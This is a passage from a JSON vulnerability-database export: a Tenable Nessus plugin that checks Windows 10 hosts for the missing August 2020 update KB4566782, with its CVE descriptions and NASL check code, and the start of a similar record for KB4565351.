the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4566782: Windows 10 Version 2004 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1459", "CVE-2020-1464", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1524", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", "CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", "CVE-2020-1548", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1569", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1578", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4566782.NASL", "href": "https://www.tenable.com/plugins/nessus/139486", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139486);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1459\",\n \"CVE-2020-1464\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1524\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n \"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1548\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1551\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1569\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1578\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4566782\");\n script_xref(name:\"MSFT\", value:\"MS20-4566782\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4566782: Windows 10 Version 2004 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4566782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists on ARM\n implementations that use speculative execution in\n control flow via a side-channel analysis, aka &quot\n ;straight-line speculation." (CVE-2020-1459)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Shell Components improperly handle\n memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1569)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4566782/windows-10-update-kb4566782\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fd4a47c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4566782.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-08\";\nkbs = make_list('4566782');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"08_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4566782])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:32", "description": "The remote Windows host is missing security update 4565351.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists on ARM implementations that use speculative execution in control flow via a side-channel analysis, aka &quot ;straight-line speculation." (CVE-2020-1459)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. 